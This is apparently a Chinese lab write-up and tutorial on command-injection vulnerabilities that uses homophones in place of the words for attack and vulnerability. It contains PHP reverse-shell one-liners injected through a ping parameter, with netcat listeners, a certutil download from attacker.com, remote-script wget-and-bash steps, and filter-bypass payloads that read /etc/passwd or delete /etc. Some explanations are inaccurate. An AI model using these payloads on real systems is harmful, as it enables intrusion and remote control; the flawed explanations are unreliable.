命令执行漏懂利用

不同

命令执行漏懂的系统命令执行和代码命令执行两者有什么不同？

命令执行漏懂通常分为两种类型：系统命令执行和代码命令执行。这两种漏懂虽然都允许公鸡者执行任意命令，但它们之间有一些关键的区别。

系统命令执行

系统命令执行漏懂允许公鸡者在宿主操作系统上执行任意系统命令。这意味着公鸡者可以执行操作系统内置的命令，如文件管理、网络通信、进程控制等。例如，在Linux系统中，公鸡者可以利用sh、bash或其他命令行界面来执行各种系统命令。

系统命令执行漏懂通常出现在应用程序需要执行一些系统操作，但没有正确验证用户输入的情况下。公鸡者可以通过操纵输入来注入恶意命令，从而在受影响的系统上执行这些命令。

代码命令执行

代码命令执行漏懂允许公鸡者执行特定于应用程序或服务的代码。这通常涉及到公鸡者能够注入和执行脚本代码或命令，这些代码会在应用程序的环境中执行，而不是操作系统级别。例如，公鸡者可能会在支持脚本的环境中注入PHP、JavaScript或SQL代码。

代码命令执行漏懂通常出现在应用程序需要执行用户提供的代码片段，但没有实施足够的安全措施来防止恶意代吗注入的情况下。

区别总结

• 范围：系统命令执行影响整个操作系统，而代码命令执行通常局限于应用程序或服务的环境。
• 执行环境：系统命令执行发生在操作系统层面，而代码命令执行则在应用程序的代码执行环境中发生。
• 权限：系统命令执行可能需要更高的权限来执行某些命令，而代码命令执行通常在应用程序的权限范围内操作。
• 影响：系统命令执行可能导致更大的影响，因为它可以对整个系统进行操作，而不仅仅是应用程序的功能。

无论是系统命令执行还是代码命令执行，这两种漏懂都极其危险，因为它们允许公鸡者在不受限制的环境中执行任意命令或代码。因此，预防这两种漏懂的最佳做法是始终验证用户输入，使用安全的编码和执行最佳实践，并对敏感操作使用隔离和沙箱环境。

常用命令执行命令

代码命令执行

代码命令执行（Code Injection）漏懂允许公鸡者在应用程序的代码执行环境中注入恶意代吗。这类漏懂常见于各种编程语言，如PHP、Python、Ruby、Java等。下面是一些代码命令执行的常用参数和指令示例，但请注意，提供这些信息的目的是为了增进安全意识和加强防御能力，而不是用于发起或促进任何形式的非法活动。

PHP

在PHP中，公鸡者可能会利用eval（)函数来执行恶意代吗，因为eval（)可以将一个字符串作为PHP代码执行。例如：

eval（$_POST['code']); // 如果没有适当验证，公鸡者可通过POST请求注入恶意代吗

其他与代码执行相关的函数还包括assert()、preg_replace()（配合/e修饰符）和call_user_func()等。

JavaScript

在JavaScript中，公鸡者可能会利用eval（)（与PHP中的类似）或者Function构造器来执行恶意代吗，例如：

eval（"alert('XSS Attack')"); // 直接执行字符串为"alert('XSS Attack')"的代码 
new Function("alert('XSS Attack')"); // 使用Function构造器创建一个新的函数并执行

SQL

在SQL注入公鸡中，公鸡者会尝试注入恶意的SQL代码片段，通过修改表单字段或URL参数等方式，使得应用程序执行这些代码。例如：

SELECT * FROM Users WHERE Name = 'admin' AND Password = 'password' OR 1=1 -- 注释内容

在这个例子中，OR 1=1部分会使SQL语句始终为真，从而绕过密吗验证。

Python

在Python中，公鸡者可能会利用exec()或eval（)函数来执行恶意代吗，例如：

exec(request.form['code']) # 如果请求没有验证，公鸡者可以提交恶意代吗
eval（request.form['expression']) # 评估用户提交的表达式

Java

在Java中，公鸡者可能会利用Runtime.exec()方法来执行系统命令，如果应用程序没有适当验证用户输入，则可能产生漏懂，例如：

Runtime.getRuntime().exec(request.getParameter("command")); // 执行用户提交的命令

防御措施

无论何种编程语言，防御代码命令执行的关键在于：

• 输入验证：对所有外部输入进行严格验证，确保它们符合预期的模式。
• 使用预编译语句（ Prepared Statements）：在数据库查询中使用预编译语句，以避免SQL注入。
• 错误处理：不要透露过多的错误信息，以防止公鸡者了解代码结构。
• 限制执行权限：限制应用程序执行命令的权限，避免使用root或管理员权限。
• 避免危险函数：避免使用危险的函数，如PHP中的eval（)，并使用更安全的替代方案。

代码命令执行漏懂非常危险，因此必须采取适当的安全措施来预防。

系统命令执行

系统命令执行（Command Injection）漏懂允许公鸡者在宿主操作系统上执行任意系统命令。这类漏懂常见于需要执行系统命令的应用程序或服务中，尤其是那些没有正确验证用户输入的情况。下面是一些系统命令执行的常用参数和指令示例，但请注意，提供这些信息的目的是为了增进安全意识和加强防御能力，而不是用于发起或促进任何形式的非法活动。

Linux 和 Unix-like 系统

在Linux和Unix-like系统中，公鸡者可能会利用各种命令来执行恶意操作，例如：

• sh 或 bash 命令行界面
• sudo 命令，如果应用程序需要提升权限
• curl 或 wget 下载恶意脚本或文件
• rm 删除重要文件
• cat 显示文件内容，有时用于读取敏感信息

例如，一个不安全的代码片段可能是这样的：

system("cat " . $_GET['file']);

在这个例子中，如果file参数未经适当验证，公鸡者可以通过file参数注入任意命令，例如file ; cat /etc/passwd来读取系统的用户密吗文件。

Windows 系统

在Windows系统中，公鸡者可能会利用不同的命令来执行恶意操作，例如：

• cmd.exe 命令提示符
• powershell.exe PowerShell脚本执行环境
• net use 命令，用于挂载网络驱动器或执行其他网络操作
• certutil 下载并导入证书，有时可用于下载恶意软件
• wmic 用于执行系统管理任务的命令行工具

例如，一个易受公鸡的代码片段可能是这样的：

system('certutil -urlcache * "http://attacker.com/malware.exe"');

在这个例子中，如果应用程序允许用户通过某种方式操纵命令参数，公鸡者可以引导应用程序从恶意服务器下载并执行恶意软件。

在ping命令后输入了两个and加上unmae -a

结果正常输出了 uname -a 参数

在bp中没有正常返回，是因为有空格进行了干扰。

对输入的参数进行url编码即可

理解这段代码

ip=127.0.0.1 1+%2526 php -r

'$sock = fsockopen("10.0.30.174", 1996); exec("/bin/sh");

-i \<\&3 \>\&3 2\u003e\&3;"; $Submit=Submit"

这段代码是一个PHP的反向Shell代码，它的作用是在目标服务器上执行一个反向Shell，从而让公鸡者能够远程控制目标服务器。

具体来说，这段代码分为以下几个部分：

1. ip=127.0.0.1：设置变量ip的值为127.0.0.1，即本地回环地址。
2. sock=fsockopen("10.0.30.174",1996)：使用fsockopen函数创建一个到目标服务器（IP地址为10.0.30.174，端口号为1996）的TCP连接。
3. exec("/bin/sh -i <&3 >&3 2>&3")：使用exec函数执行一个命令，该命令会启动一个/bin/sh shell，并将其输入、输出和错误重定向到之前创建的TCP连接。
4. ;：分隔符，用于将多个命令放在同一行。
5. '&submit=Submit'：这部分代码可能是为了混淆视听，没有实际作用。

综上所述，这段代码的目的是在目标服务器上执行一个反向Shell，从而让公鸡者能够远程控制目标服务器。

kali输入命令

nc -lvvp 1996

接收反弹shell成功

命令nc -lvvp 1996是使用Netcat（nc）工具的一个典型指令，用于在网络渗头测试或调试场景中监听本地的一个端口。下面是这个命令的各部分含义：

• nc: Netcat的命令，这是一个多功能的网络工具，常被称为“瑞士***军刀”wang络工具，因为它能完成多种网络相关的任务，如读写数据、扫描端口等。
• -l: 表示以监听（listen）模式启动Netcat，意味着它会等待其他客户端连接到指定端口，而不是主动去连接其他服务器。
• -v: 代表verbose（详细），增加这个选项后，Netcat会在运行时输出更详细的通信信息，比如连接建立、数据传输等过程的详细日志。
• -vv：比-v更加详细的信息输出，但在这里你只用了-v，不过有时候人们会误以为加两个v是更详细的输出，实际上单个-v已经提供了较为详细的信息。
• -p 1996: 指定Netcat监听的端口号，这里是1996端口。这意味着Netcat将会在本地的1996端口上等待其他设备或服务的连接请求。

综上所述，整个命令nc -lvvp 1996的意思是：在本地开启Netcat，以监听模式监听1996端口，并且在运行过程中输出较为详细的通信日志信息。这通常用于搭建测试服务器，等待外部连接来进行进一步的交互或数据传输，例如在进行漏懂利用、接收shell回话或是进行文件传输时使用。至于命令末尾的kali，在上述命令语境中没有直接意义，除非是在某些特定的上下文中作为注释或者说明（比如指示目标是Kali机器上的服务），但在标准的Netcat命令格式中，它并不是一个有效参数。正确的命令仅包含前面提到的部分。

防御措施

无论何种操作系统，防御系统命令执行的关键在于：

• 输入验证：对所有外部输入进行严格验证，确保它们符合预期的模式。
• 使用安全函数：使用安全的API或函数，例如在PHP中使用escapeshellarg()和escapeshellcmd()来转义用户输入。
• 最小权限原则：确保应用程序和服务以最小的权限运行，避免使用管理员或root账户。
• 日志监控：监控系统日志，以便及时发现异常命令执行行为。
• 防火墙和网络监控：使用防火墙和其他网络监控工具来检测和阻止可疑的网络活动。

系统命令执行漏懂非常危险，因此必须采取适当的安全措施来预防。

应用场景

命令执行漏懂常常出现在应用程序需要与操作系统交互的场景中，下面列举了一些常见的命令执行利用场景：

1. Web 应用程序：

• 文件上传：公鸡者可以通过文件上传功能上传可执行文件，并通过命令执行漏懂执行这些文件。
• 命令执行漏懂的利用：公鸡者可以通过各种手段（如SQL注入）来获取数据库中的敏感信息，然后通过命令执行漏懂将这些信息泄露出来。
• 服务器配置不当：如果服务器配置不当，公鸡者可以利用命令执行漏懂进行服务器控制权的夺取。

2. 网络设备：

• 远程访问：网络设备往往有远程访问功能，如果这些功能没有正确配置或存在漏懂，公鸡者可以远程执行命令。
• 固件升级：固件升级过程中可能存在命令执行的风险，公鸡者可以利用这个漏懂来植入恶意固件。

3. 移动应用：

• 越狱或Root后利用：对于已经越狱的iOS设备或已Root的Android设备，公鸡者可以利用命令执行漏懂来进一步控制系统。
• 恶意应用：恶意应用可能通过命令执行漏懂与其他恶意软件通信，或者窃取用户数据。

4. 遗留系统和旧软件：

• 未打补丁的系统：旧系统可能没有及时打上安全补丁，公鸡者可以利用已知的命令执行漏懂进行公鸡。
• 不再支持的软件：不再支持的软件可能存在已知的安全漏懂，公鸡者可以利用这些漏懂执行命令。

5. 云服务和容器平台：

• 配置不当：云服务和容器平台的配置不当可能导致命令执行漏懂，公鸡者可以利用这些漏懂影响多个客户。
• 特权升级：在容器或虚拟机中，公鸡者可以通过命令执行漏懂来提升权限，进而突破隔离机制。

6. 物联网设备：

• 默认凭据：许多物联网设备出厂时带有默认的用户名和密吗，公鸡者可以利用这些账户通过命令执行漏懂控制设备。
• 固件逆向工程：公鸡者可以通过逆向工程固件来发现命令执行漏懂，并利用这些漏懂进行公鸡。

7. 内部威胁：

• 权限滥用：内部人员可能利用他们的权限执行未经授权的命令，获取敏感信息或破坏系统。
• 恶意软件：内部人员也可能故意安装恶意软件，通过命令执行漏懂进行数据泄露或其他恶意行为。

防御命令执行漏懂的关键在于预防，包括但不限于对输入进行严格的验证、使用安全的编程实践、最小权限原则以及定期的安全审计和漏懂扫描。

手工测试

在代码执行漏懂（Code Execution Vulnerability）的测试中，phpinfo()经常被用作一个简单的测试案例，来验证是否能够成功执行PHP代码。这种漏懂通常出现在允许用户输入直接或间接被执行的场景中，比如不安全的 eval（) 使用、包含文件功能（include, require）的不当处理等。

手工测试方法步骤：

1. 识别潜在的注入点：首先，你需要找到一个可能接受并执行外部输入的地方，如URL参数、表单提交、cookies或是其他用户可控的数据输入渠道。
2. 构造测试Payload：对于phpinfo()测试，你可以尝试直接在这些输入点插入PHP代码片段。最直接的方式是尝试让目标执行phpinfo()函数。

示例

假设有一个简单的包含文件功能的页面，它通过URL参数page来包含不同的PHP文件：

http://example.com/include.php?page=header.php

你可以尝试修改URL，让它包含一个恶意的PHP代码段，而不是一个合法的文件名：

http://example.com/include.php?page=phpinfo%20()%3B

这里，%20是空格的URL编码，%3B是分号的URL编码。因此，整个payload解码后就是 phpinfo();，试图直接执行phpinfo函数。

反弹shell代码

代码执行

这段代码是一个使用PHP编写的反向Shell（反弹Shell）脚本，用于在远程服务器上执行命令并返回结果。以下是对代码的解读：

1. php -r：这个部分是在命令行中执行PHP代码的标志，-r 表示 "run code"，即运行一段PHP代码。
2. 's sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3>&3 2>&3");'：这是一段PHP代码，被单引号包围。这段代码的作用是创建一个网络连接，并通过这个连接执行一个shell。

• $sock = fsockopen("10.0.0.1",1234)：这部分代码使用fsockopen函数创建一个新的网络socket连接到IP地址为10.0.0.1，端口号为1234的服务器。
• exec("/bin/sh -i <&3>&3 2>&3")：这部分代码使用exec函数执行一个shell命令。/bin/sh是shell的路径，-i标志表示交互模式，<&3>&3 2>&3是将标准输入、输出和错误重定向到之前创建的网络socket连接。

总结来说，这段代码的作用是在本地创建一个网络连接，连接到远程服务器（IP地址为10.0.0.1，端口号为1234），然后在远程服务器上执行一个交互式的shell，并将这个shell的标准输入、输出和错误重定向回本地的连接。这样，公鸡者就可以通过这个连接在远程服务器上执行任意命令，并获得命令的输出。

$sock=fsockopen("192.168.0.134",1234);exec("/bin/sh -i <&3 >&3 2>&3");

这段代码是一个使用PHP编写的反向Shell（反弹Shell）脚本，用于在远程服务器上执行命令并返回结果。以下是对代码的解读：

1. $sock = fsockopen("192.168.0.134", 1234);：这部分代码使用fsockopen函数创建一个新的网络socket连接到IP地址为192.168.0.134，端口号为1234的服务器。
2. exec("/bin/sh -i <&3 >&3 2>&3");：这部分代码使用exec函数执行一个shell命令。/bin/sh是shell的路径，-i标志表示交互模式，<&3 >&3 2>&3是将标准输入、输出和错误重定向到之前创建的网络socket连接。

总结来说，这段代码的作用是在本地创建一个网络连接，连接到远程服务器（IP地址为192.168.0.134，端口号为1234），然后在远程服务器上执行一个交互式的shell，并将这个shell的标准输入、输出和错误重定向回本地的连接。这样，公鸡者就可以通过这个连接在远程服务器上执行任意命令，并获得命令的输出。

系统执行

System('wget xxxxx/1.sh')

该代码片段是一个命令执行的例子，使用了System函数来执行一个系统命令。这里的命令是wget xxxxx/1.sh，它指示系统通过wget（一个用于下载文件的命令行工具）从地址xxxxx/1.sh下载一个名为1.sh的文件。

具体的行为取决于上下文，比如xxxxx可能是一个IP地址或者域名，而1.sh可能是任意的文件名。如果xxxxx指向的是公鸡者的服务器，并且1.sh是一个恶意脚本，那么这段代码就构成了一个安全漏懂，允许公鸡者执行远程代码。

具体解读如下：

• System 是一个函数或方法，用于在当前操作系统的命令行中执行给定的命令。
• 'wget xxxxx/1.sh' 是要执行的命令，其中 wget 是一个常用的命令行工具，用于从指定的 URL 下载文件。
• xxxxx/1.sh 是目标 URL，表示要下载的文件位于该 URL 路径下，并且文件名为 1.sh。

请注意，上述代码片段只是一个示例，实际使用时需要将 xxxxx 替换为有效的目标 URL。此外，根据具体的编程语言和环境，System 函数的实现方式可能会有所不同。

第一行：

System('chmod +x 1.sh');

这里正在使用chmod命令来修改文件权限。chmod是Unix/Linux系统中的一个命令，用来改变文件或目录的权限。+x表示添加执行权限，而1.sh是文件的名称。所以这行代码的作用是给文件1.sh添加执行权限。

第二行：

system('/bin/bash 1.sh');

这行代码在使用/bin/bash命令 shell 来执行1.sh文件。/bin/bash是Linux系统下的一个命令解释器，它会解析并执行1.sh文件中的命令。这意味着1.sh应该是一个包含合法Shell命令的脚本文件。

结合来看，这两行代码的功能是首先确保1.sh文件具有可执行权限，然后通过系统Shell来执行这个脚本。如果1.sh包含了恶意代吗，那么执行这个脚本可能会导致安全问题。然而，在没有上下文的情况下，我们不能断定这两行代码是有害的，因为它们只是简单地执行了一个名为1.sh的脚本文件。

安全注意事项：

• 如果1.sh的内容来自不可信源，可能会存在安全风险。
• 在执行任何外部脚本或程序之前，应确保其来源可靠并且已经被过安全检查。
• 最好不要直接执行用户可修改的脚本文件，除非已经对其进行了充分的验证和安全处理。

执行绕过

在PHP中换行是/n/r

%0a%0d  这两个是分别表示换行符和回车符

这样在终端里也可以成功执行

甚至这样也可以成功执行

这样同样也可以

在kali里不可以执行，但是^在linux里可以

加()也可以

加反斜杠也可以绕过

这样也行，你悟了吗

ping 2130706433 等于 ping 127.0.0.1 的原因是在于 2130706433 是 127.0.0.1 的一个等价表示。

下面是一些常见的系统命令执行绕过技术及其示例：

使用环境变量

公鸡者可能会尝试将命令拆分并通过环境变量传递以绕过直接的命令执行检查。

示例： 如果直接执行System('cat /etc/passwd')被阻止，公鸡者可能会设置一个环境变量来存储命令的一部分，然后通过该环境变量执行命令。

export CMD=cat /etc/passwd 
System('sh -c $CMD')

使用函数或脚本

公鸡者可能会创建一个包含恶意命令的函数或脚本，然后调用这个函数或脚本来执行命令。

示例： 在某些语言中，公鸡者可以定义一个包含恶意命令的函数，然后调用这个函数。

def evil_command():
    import os 
    os.system('cat /etc/passwd')
 
evil_command()

利用已存在的命令或程序

公鸡者可能会利用已存在的命令或程序的正常功能来执行恶意命令。

示例： 如果应用程序允许用户指定一个可执行文件的路径，公鸡者可能会指定一个合法的程序并将恶意命令作为参数传递。

System('/usr/bin/env cat /etc/passwd')

在这个例子中，/usr/bin/env是一个合法的命令，用于查找并执行指定的程序，这里被用来执行cat /etc/passwd。

使用Base64编码或其他编码方式

公鸡者可能会将命令进行编码，以避开简单的命令检测。

示例： 如果直接执行的命令被检测并过滤，公鸡者可以将命令进行Base64编码，然后再解码执行。

# 将命令进行Base64编码 
echo 'cat /etc/passwd' | base64 
# 解码执行 
System('echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | sh')

绕过WAF或IDS

公鸡者可能会尝试绕过Web应用程序防火墙（WAF）或入侵检测系统（IDS），这些系统可能会拦截和阻止明显的命令执行公鸡。

示例： 如果WAF拦截了含有cat关键字的请求，公鸡者可能会使用其他命令或工具来达成相同目的，例如使用curl或grep。

System('curl localhost/etc/passwd')

在Web系统中，命令执行绕过通常涉及公鸡者利用应用程序的安全漏懂，绕过安全控制来执行恶意命令。以下是一些常见的Web系统命令执行绕过技术和相应的示例。

参数注入

如果应用程序使用用户提供的输入作为系统命令的一部分，而没有适当过滤，公鸡者可以通过注入恶意参数来执行自定义命令。

示例： 假设一个应用程序有一个功能，允许用户下载文件，但是它没有正确过滤用户提供的文件名。

<?php 
$file = $_GET['file'];
System("wget $file");
?>

公鸡者可以通过在URL中注入一个恶意命令来利用这一点，例如访问http://example.com/download.php?file=--no-check-certificate&user-agent=rm%20-afr%20/etc，这会导致系统执行wget --no-check-certificate rm -afr /etc命令。

基于编码的绕过

如果应用程序对特殊字符进行编码，公鸡者可以利用这种编码来构造恶意命令。

示例： 如果应用程序检测到命令中有特殊字符并对其进行转义，公鸡者可以使用URL编码（百分号编码）来绕过这种转义。

http://example.com/download.php?file=rm%20-afr%20/etc

使用合法命令的漏懂

公鸡者可能会利用合法命令的漏懂来执行自定义命令。

示例： 如果应用程序使用php命令来处理PHP脚本，而没有限制脚本的来源，公鸡者可以上传一个恶意的PHP脚本并让应用程序执行它。

<?php system('cat /etc/passwd'); ?>

多阶段命令执行

公鸡者可能会通过多个阶段的命令执行来绕过安全措施。

示例： 如果直接的命令执行被阻止，公鸡者可以使用一个合法的命令来生成另一个命令，然后执行它。

http://example.com/download.php?file=echo%20Y2F0IC9ldGMvcGFzc3dk%7C%20base64%20-d%20%7C%20sh

在这个例子中，echo Y2F0IC9ldGMvcGFzc3dk|base64 -d | sh会被解码为cat /etc/passwd，然后执行。

结语

防止系统命令执行绕过的关键在于实施严格和多层次的安全措施。包括但不限于输入验证、限制命令的执行权限、使用安全的编码和配置管理实践。同时，定期的安全审计和渗头测试也是保证系统安全的重要环节。

漏懂防御

不使用命令执行函数

如果一定要使用命令执行函数，则进行输入验证

输入的命令尽量使用占位符进行使用，不要直接拼接变量

尽量不要执行危险函数，将 disable functions 禁用

使用 escapeshellcmd 函数进行过滤

使用 safe_mode_exec_dir，指定可执行文件的路径

注：wget是一个常用的Linux命令行工具，用于在命令行界面中下载文件。它支持HTTP、HTTPS和FTP协议，可以用来下载网页、图片、视频等各种类型的文件。wget命令具有很多选项，可以定制下载过程，例如指定下载文件的名字、设置代理、断点续传等。

基本语法结构如下：

wget [选项] [URL]

其中，[选项]是命令的各种参数，而[URL]是要下载文件的网络地址。

一些常见的wget命令选项包括：

• -O 或 --output-document: 指定输出文件名。
• -P 或 --directory-prefix: 指定下载文件的保存目录。
• -c 或 --continue: 断点续传，继续未完成的下载。
• -N 或 --timestamping: 只更新比本地文件新的文件。
• -q 或 --quiet: 静默模式，不显示输出信息。
• -v 或 --verbose: 详细模式，显示更多信息。
• -t 或 --tries: 设置尝试次数，下载失败后重试。
• -A 或 --accept: 仅下载特定类型或扩展名的文件。
• -U 或 --user-agent: 指定用户代理字符串，有时用于伪装下载请求。

例如，要下载一个名为example.txt的文件，你可以使用：

wget http://example.com/example.txt

如果要将文件保存到指定的目录，例如/home/user/downloads，你可以使用：

wget -P /home/user/downloads http://example.com/example.txt

wget是一个非常强大的工具，适用于各种自动化下载任务和脚本。由于其非交互式特性，它特别适合在后台运行和调度任务。